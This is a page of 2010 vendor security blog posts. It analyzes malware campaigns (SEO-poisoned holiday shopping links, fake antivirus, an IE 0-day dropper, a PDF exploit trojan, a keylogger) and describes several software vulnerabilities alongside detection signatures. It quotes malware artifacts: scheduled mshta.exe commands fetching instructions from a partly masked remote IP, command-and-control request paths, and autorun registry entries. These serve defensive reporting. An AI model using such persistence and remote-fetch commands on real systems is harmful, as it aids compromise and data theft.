Posts

Holiday Shopping – Black Hat SEO (Nov 18, 2010)

/in /by

SonicWALL UTM Research team discovered a number of polluted results appearing in search engine results for holiday shopping related search terms. Malware authors often use SEO poisoning technique to lure unsuspecting users into clicking on malicious links strategically placed in search engine results. For instance, search term “Walmart Black Friday Sales 2010” leads users to the malicious search results shown below

screenshot

If the user clicks on the malicious link then it performs the following on the victim’s machine

  • The initial link redirects users to another page containing a JavaScript, an extract of which is shown below. Based on the user’s web browser it redirects to an appropriate landing page.

    screenshot

  • If the user is using Internet Explorer it redirects to a FakeAV landing page

    screenshot

  • If the user is using Firefox then it redirects to a fake Firefox update page suggesting an upgrade to flash player:

    screenshot

    If the user downloads and executes the fake flash update then it performs the following on the victim’s machine

    • Drops files:
      • %temp%/Img.exe [Detected as GAV: Renos.MJ_4 (Trojan)]
      • %temp%/Imh.exe [Detected as GAV: Renos.MJ_4 (Trojan)]
      • %temp%/Imi.exe [Detected as GAV: Renos.MJ_4 (Trojan)]
      • %windir%/Ipisoa.exe (Copy of Img.exe) [Detected as GAV: Renos.MJ_4 (Trojan)]

    • Creates registry entry to ensure that the dropped malware runs on every system reboot:
      • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun: “%temp%/Imh.exe”

    • Posts confidential data back to remote servers

      screenshot

    • It redirects the browser and opens pop-up windows

Similar results were observed for other post Thanksgiving holiday shopping season related search terms like “Black Friday” and “Cyber Monday”.

SonicWALL Gateway AntiVirus provides protection against this threat via following signatures:

GAV: Renos.MJ_4 (Trojan)
GAV: GAV: FakeAlert.SR (Trojan)
GAV: JSRedir.BF (Trojan)
GAV: Suspicious#fakeav.html (Trojan)

screenshot

Novell GroupWise Internet Agent Content-Type BO (Nov 18, 2010)

/in /by

GroupWise is a messaging and collaborative software platform from Novell that supports email, calendaring, personal information management, instant messaging, and document management. The platform consists of the client software, which is available for Windows, Mac OS X, and Linux, and the server software, which is supported on Windows Server, NetWare, and Linux. The latest generation of the platform is GroupWise 8. Novell GroupWise Internet Agent is a component of Novell GroupWise and provides email services, supporting SMTP, POP, and IMAP protocols.

Simple Mail Transfer Protocol (SMTP) is an Internet standard for electronic mail (e-mail) transmission across Internet Protocol (IP) networks. SMTP was first defined by RFC 821 and last updated by RFC 5321 (2008). SMTP is specified for outgoing mail transport and uses TCP port 25. A typical example of sending a message via SMTP to two mailboxes (alice and theboss) located in the same mail domain (example.com) is reproduced in the following session exchange: 

 S: 220 smtp.example.com ESMTP Postfix C: HELO relay.example.org S: 250 Hello relay.example.org, I am glad to meet you C: MAIL FROM: S: 250 Ok C: RCPT TO: S: 250 Ok C: RCPT TO: S: 250 Ok C: DATA S: 354 End data with . C: From: "Bob Example"  C: To: "Alice Example"  C: Cc: theboss@example.com C: Date: Tue, 15 Jan 2008 16:02:43 -0500 C: Subject: Test message C: C: Hello Alice. C: This is a test message with 5 header fields and 4 lines in the message body. C: Your friend, C: Bob C: . S: 250 Ok: queued as 12345 C: QUIT S: 221 Bye

A Content-Type header is an option header for a SMTP traffic, which is used to declare the general type of data, while the subtype specifies a specific format for that type of data. A Content-Type of “text/plain” is sufficient to tell an agent that the data is text. Additional entities in the field are separated by a semicolon. The Content-Type header has the following format:

 Content-Type: text/plain; [OTHER ENTITIES]

A buffer-overflow vulnerability exists in the Novell GroupWise Internet Agent service. More specifically, the vulnerability is due to a boundary failure in the methods responsible for processing the data inside the Content-Type header field of the message being processed. Remote attackers could exploit this vulnerability by supplying a specially crafted “Content-Type” header to the server, which allows for arbitrary code injection and execution with SYSTEM privileges.

SonicWALL UTM team has researched this vulnerability and created the following IPS signatures to detect the attacks addressing this vulnerability.

  • 6010 Novell GroupWise Internet Agent Content-Type BO
  • 6011 Novell GroupWise Internet Agent Content-Type BO 2

This vulnerability has not been assigned a Common Vulnerabilities and Exposures (CVE) identifier.

ThinkPoint FakeAV (Nov 12, 2010)

/in /by

SonicWALL UTM Research team received reports of a new fake antivirus Trojan in the wild. This Trojan attemps to access a php script on a compromised webserver on the internet for further instructions.

During our research we found that the Trojan will masquerade as the legitimate antivirus product “Microsoft Security Essentials”, complete with fake pop-up alerts and detailed scan results.

screenshot

screenshot

The screenshots seen above are a result of attempting to run specific legitimate programs such as Internet Explorer and RegEdit that are chosen by this fake antivirus to be a potential threat to the system.

The Trojan performs the following activities upon execution:

  • Drops the following three files on the compromised machine:
    • C:Documents and SettingsUserApplication Data444.bat

        • Contains script with 24 task entries. eg:

          at 00:23 /every:M,T,W,Th,F,S,Su mshta.exe http://91.188.x.x/77t.php?olala=4032432825575030
          at 01:23 /every:M,T,W,Th,F,S,Su mshta.exe http://91.188.x.x/77t.php?olala=4032432825575030
          at 02:23 /every:M,T,W,Th,F,S,Su mshta.exe http://91.188.x.x/77t.php?olala=4032432825575030
          ...

          etc.

    • C:Documents and SettingsUserApplication Dataasdsada.bat

        • Contains script to delete the fakeav installer.

    • C:Documents and SettingsUserApplication Datahotfix.exe

  • Creates the following registry entry to ensure regular startup:
    • HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogon Shell “C:Documents and SettingsUserApplication Datahotfix.exe”

  • Additional registry keys created:
    • HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache C:Documents and SettingsUserApplication Data444.bat “444”
    • HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache C:Documents and SettingsUserApplication Dataasdsada.bat “asdsada”

  • Creates 24 scheduled tasks in C:WINDOWSTasks to ensure it runs hourly:
    • C:WINDOWSTasksAt<1-24>.job

  • Attemps to use mshta.exe to open a url in order to receive further instructions:
    • URL: http://91.188.x.x/77t.php?olala=4032432825575030

SonicWALL Gateway AntiVirus provided protection against this threat via the following signature:

GAV: FakeAv.IOX (Trojan)

Microsoft Security Bulletins Coverage (Nov 09, 2010)

/in /by

SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of November, 2010. A list of issues reported, along with SonicWALL coverage information follows:

MS10-087 Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2423930)

  • CVE-2010-3333 – RTF Stack Buffer Overflow Vulnerability
    IPS 5950 Word RTF File Parsing Stack BO
  • CVE-2010-3334 – Office Art Drawing Records Vulnerability
    IPS 5955 Office Art Drawing Records Vulnerability
  • CVE-2010-3335 – Drawing Exception Handling Vulnerability
    IPS 5956 Malicious Excel Document 7b
  • CVE-2010-3336 – MSO Large SPID Read AV Vulnerability
    IPS 5957 Malicious Word Document 5b
    IPS 5958 Malicious Excel Document 8b
  • CVE-2010-3337 – Insecure Library Loading Vulnerability
    IPS 5726 Possible Binary Planting Attempt

MS10-088 Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution (2293386)

  • CVE-2010-2572 – PowerPoint Parsing Buffer Overflow Vulnerability
    IPS 5954 Malicious PowerPoint Document 1b
  • CVE-2010-2573 – PowerPoint Integer Underflow Causes Heap Corruption Vulnerability
    IPS 5945 Malicious PowerPoint Document 1b

MS10-089 Vulnerabilities in Forefront Unified Access Gateway (UAG) Could Allow Elevation of Privilege (2316074)

  • CVE-2010-2732 – UAG Redirection Spoofing Vulnerability
    Note: There is no way to differentiate malformed and legitimate traffic.
  • CVE-2010-2733 – UAG XSS Allows EOP Vulnerability
    Note: There are no known public exploits targeting this vulnerability.
  • CVE-2010-2734 – XSS Issue on UAG Mobile Portal Website in Forefront Unified Access Gateway Vulnerability
    Note: There are no known public exploits targeting this vulnerability.
  • CVE-2010-3936 – XSS in Signurl.asp Vulnerability
    Note: There are no known public exploits targeting this vulnerability.

MS Excel PtgExtraArray Parsing Memory Corruption (Nov 5th, 2010)

/in /by

Microsoft Excel is a spreadsheet application released as a component of the Microsoft Office suite. The application can create complex spreadsheets with multiple workbooks, formulas, and various data sources. The file format used for storing Microsoft Excel documents is known as the Binary Interchange File Format (BIFF).

In BIFF5 versions and above, data inside all Office Document files is stored in a series of streams. These streams contain meta-data information about the document, such as the author name, subject, and in case of Excel documents, individual sheet names. Excel specific data is organized as a series of Records. The common structure of an Excel Record is shown below: 

Offset  Size    Contents ------- ------- ------------------------------------------ 0x0000  int16   Identifier (Type) 0x0002  int16   Size of the following data (n) 0x0004  char[n] Record Data

The Formula record (type 0x06) describes a cell that contains a formula in the Excel file. The Formula record structure is shown below: 

Offset  Size    Contents ------- ------- ------------------------------------------ 0x0000  int16   type (0x6) 0x0002  int16   length of the Formula record data 0x0004  int16   row 0x0006  int16   column 0x0008  int16   index to XF record 0x000A  char[8] current value of the formula 0x0012  int16   option flags 0x0014  int32   chn 0x0018  int16   cce length of the expression (n) 0x001A  char[n] rgce parsed expression

Within the Formula record, the rgce field contains the formula in its parsed format which is the internal tokenized representation of an Excel formula. A parsed expression contains a sequence of tokens, each of which consists of a token type and a token value.
When an rgce contains one or more tokens that rquire extra data, the containing formula structure includes an RgbExtra section containing the data for those records. A structure, PtgExtraArray, is contained within the RgbExtra section. The structure is defined as shown: 

Offset  Size    Contents ------- ------- ------------------------------------------ 0x0000  char    cols  0x0001  int16   rows 0x0003  n       SerAr[n]

A memory corruption vulnerability exists in Microsoft Office Excel. The vulnerability is due to improper processing of the PtgExtraArray structure within the Formula record of Excel files. The vulnerable code uses the values provided in the cols and rows fields of the PtgExtraArray structure to calculate the number of the elements in the SerAr[] array. The result of this calculation is not verified. This value is then used as the counter in a loop that copies SerAr structures sequentially into a memory buffer.

If the total size of the SerAr structures is large enough then the memory copy loop may write past the boundary specified for the Formula record, overwriting potentially critical data.

Exploitation of this flaw may result in arbitrary code execution. Remote attackers could exploit this vulnerability by persuading unsuspecting users to open a crafted Excel file. Successful exploitation would allow arbitrary code injection and execution in the security context of the logged in user.

SonicWall has released an IPS signature to address a known exploit targeting this vulnerability. The following signature was released:

  • 5915 – MS Excel PtgExtraArray Parsing Memory Corruption PoC 2 (MS10-080)

This vulnerability has been assigned CVE-2010-3231 by mitre. The vendor has released an advisory regarding this issue.

New IE 0-day Vulnerability (Nov 5, 2010)

/in /by

SonicWALL UTM Research team received reports of a new Internet Explorer 0-day Vulnerability reported here being exploited in the wild. Internet Explorer version 6, 7 and 8 are affected by it. The vulnerability is actively being targeted in the wild by specially crafted HTML pages on compromised sites.

The HTML page contains a heavily obfuscated malicious java script code that encloses the shell code and NOP sled. Upon successful exploit attempt, the shell code gets executed and it will lead to download & execution of a malicious executable file on the victim machine.

During our research we found the shell code enclosed within the JavaScript to be encrypted and snippet of the decrypted code can be seen below:

screenshot

The code seen above leads to the download of linkbl.gif file from a compromised site, which is an encrypted malicious executable and has a GIF header to avoid AV detection. The file gets decrypted and the GIF header is replaced by MZ header on the victim machine.

The malware performs following activities upon execution:

  • Drops following two files on the victim machine:
    • (STARTUP)/ctfmon.exe [Detected as GAV: Agent.IEM (Trojan)]
    • (SYSTEM32)/msnetacsvc.dll [Detected as GAV: Pirpi.D (Trojan)]

  • Creates the following registry entry to ensure that the dropped malware runs on every system reboot:
    • HKLM_SYSTEM_ServicesNWCWorkstationParametersServiceDll: “%SystemRoot%System32msnetacsvc.dll”
    • HKLM_SYSTEM_ServicesNWCWorkstationImagePath: “%SystemRoot%System32svchost.exe -k netsvcs”
    • HKLM_SYSTEM_ServicesNWCWorkstationDisplayName: “NetWare Workstations”

  • Opens a backdoor on victim machine and attempts to connect to an IP address of a server hosted in Poland. The server is still actively serving encrypted command files at the time of writing this alert. Sample command files requested:
    • GET /bbs/OmIxA9gILmICAAAAPDlUKWrsYsjh0XQxOpixOpixOpiA.gif
    • GET /binary/jXor5LTseXmEAAAAihV0f-Pux4Xbv_grj1Wrj1Wrj1UA.rar
    • GET /picture/OdEw2TlxLdEDAAAAPThVKGntYcfg0HUwO9ewO9ewO9eA.jpg
    • GET /images/Y6V8BWHA1AUIAAAAWtefUqtsaX7fGXD9g5mA.gif
    • GET /news/kHgu4hdmhHeCAAAAlx7Xgkpzwkh7xecukL8ukL8ukL6A.jpg
    • GET /pic/9AWMBYsPcAUgAAAA8un9djhBrNp2tiOM9IoM9IoM9ImA.bmp

    Directories contacted on the server include bbs, binary, pic, picture, image, images, index, and news.

SonicWALL Gateway AntiVirus provided protection against this threat via following signatures:

GAV: CVE-2010-3962.A (Exploit)
GAV: Pirpi.D#dldr (Trojan)
GAV: Agent.IEM (Trojan)
GAV: Pirpi.D (Trojan)
IDP: 5908 Malicious HTML Style Tag 1

IBM Rational Products Backdoor Account Access (Oct 29, 2010)

/in /by

The IBM Rational is a web-based quality solution integrating the management and deployment of test environments within the quality management lifecycle. It incorporates Apache Tomcat to serve custom web applications.

To connect to a Tomcat application, a user must provide valid credentials. The user’s username and password will be included in the “Authorization:” HTTP header with each request.

A security-restriction-bypass vulnerability exists in IBM Rational products. Tomcat stores its user credentials within the configuration file tomcat-users.xml. When IBM Rational is installed, the user ADMIN is added to the configuration file with a default password; the role “manager” is also associated with this user. In an attack scenario, a remote attacker can use these default credentials to upload and run arbitrary web applications on the vulnerable system, within the security context of the affected process.

For more information about this vulnerability, please see SecurityFocus bid 44172.

SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting these vulnerabilities. The signature is listed below:

  • 5890 IBM Rational QM/TLM Default Account Access

New Adobe Acrobat 0-day Vuln (Oct 28, 2010)

/in /by

SonicWALL UTM Research team received reports of a new Adobe 0-day Vulnerability reported here being exploited in the wild. This new vulnerability is being targeted by a specially crafted PDF file. Upon successful exploit attempt, it will drop & execute a malicious executable file on the victim machine.

Installation:

Once the user opens the malicious PDF file, it will drop the following payloads on %TEMP% folder:

  • ~temp.bat
    – Waits for 3 seconds
    – Do process cleanup on crashed Adobe Acrobat application by terminating the running instance
    – Opens the clean PDF file that it drops to make it appear normal to the end user

    • The content of the file ~temp.bat looks like:

    screenshot

  • nsunday.exe – [GAV: Wisp.A_2 (trojan)]
    – payload malicious executable file

After successfully exploit attempt on the Adobe Acrobat application, the control will be transferred over to nsunday.exe to continue its infection.

Malware Routine:

  • Drops the malicious file nsunday.dll in %TEMP% folder and injects it to the following running processes:
    • iexplore.exe
    • outlook.exe
    • firefox.exe
  • Creates the following registry entry to ensure that the malware runs on every system reboot:
    • Key: [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] Value: nsunday
      Data: “{user}Local SettingsTempnsunday.exe -installkys”
    Contacts following domain:

    • news.mysundayparty.com
  • Request commands from remote url:
    • news.m{REMOVE}/kys_allow_get.asp?name=getkys.kys

    Sample screenshot of the commands received:

    screenshot

      These commands include:

    • Downloading of other malicious files.
    • Uploading of files to remote server
    • Retrieving system information

    Sample screenshot of the information retrieved from the system:

    screenshot

  • Uploads retrieved system information to remote url:
    • news.m{REMOVE}/kys_allow_put.asp?type=

    Other dropped files:

    • %TEMP%gdnsunday.tmp – text file containing the commands received from the remote server
    • %TEMP%gnsunday.tmp – encrypted data
    • %TEMP%pdnsunday.tmp – text file containing the gathered system information

    SonicWALL Gateway AntiVirus provided protection against this malware via the following:

    GAV: Wisp.A_2 (Trojan)
    GAV: PDF.JS_3 (Exploit)
    IPS: Adobe Shockwave rcsL Chunk Memory Corruption PoC
    IPS: Adobe Shockwave rcsL Chunk Memory Corruption PoC 2

HP Data Protector Media Operations DoS (Oct 22, 2010)

/in /by

HP Data Protector Media Operations is a life cycle media management solution providing tracking and management of off-line storage media such as magnetic tapes. The HP Data Protector Media Operations service is provided by the DBServer.exe process. By default, the process listens for connections on TCP port 19813.

A denial of service vulnerability exists in HP Data Protector Media Operations server process. Specifically, the vulnerability is due to a NULL pointer dereference error when processing incoming requests. A NULL pointer dereference error will trigger an invalid memory access and crash the server process. A remote attacker can exploit these vulnerabilities by sending crafted requests to the target server. Successful exploitation would cause the DBServer.exe to terminate abnormally, resulting in the denial-of-service condition.

For more information about this vulnerability, please see Secunia Advisory SA41698.

SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting these vulnerabilities. The signature is listed below:

  • 5866 HP Data Protector Media Operations DoS

Bandok Keylogger Trojan (Oct 21, 2010)

/in /by

SonicWALL UTM Research received reports of new backdoor Trojan being spammed in the wild. The trojan arrives via email as an attachment.

If the user downloads and executes the file attachment from the email then it performs the following activities on the victim machine:

  • Process Information:
    • It creates the following processes
      • firefox.exe
      • cfmon_.exe
    • It creates the following mutexes
      • BEN333JDJDJ
      • fHDVQUw

  • Network Activity:
    • It connects to {removed}.com and downloads the following files.

      • screenshot

    • It uploads hardvested information back to the same domain. Here is screenshot of currently harvested user information as seen on the domain indexed by username.

      • screenshot

  • File Activity:

    It creates the following files

    • %windir%system32dreambupl.dll
    • %windir%system32dreambupws.dll
    • %windir%system32dreambupws.dll
    • %windir%system32dreamsqlite3.dll
    • %windir%system32dreamctfmon_.exe – Detected as GAV: Bandok.WG_2 (Trojan)
    • %windir%system32dreamdreamwaver.exe (copy of itself) – Detected as GAV: Bandok.WG (Trojan)
    • %windir%system32dream.bns
    • %windir%system32dreamblogs{DD}_{MM}_{YYYY}.html

      •   This file contains information about open windows and associated keystrokes which is uploaded to the domain. Sample of the file is as below: screenshot

  • Registry Activity:
    • It creates “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun {VB45O-P98RE-KJL43-NMB4-DFR3T}” with value “%windir%System32dreamdreamwaver.exe” to ensure that it runs on every reboot

  • Information Harvesting:
    • It logs keystrokes for each active application
    • It logs form data from open web sessions
    • It harvests e-mail addresses from address book

SonicWALL Gateway AntiVirus provides protection against this Bandok Trojan with the following signatures
  GAV: Bandok.WG (Trojan)
  GAV: Bandok.WG_2 (Trojan)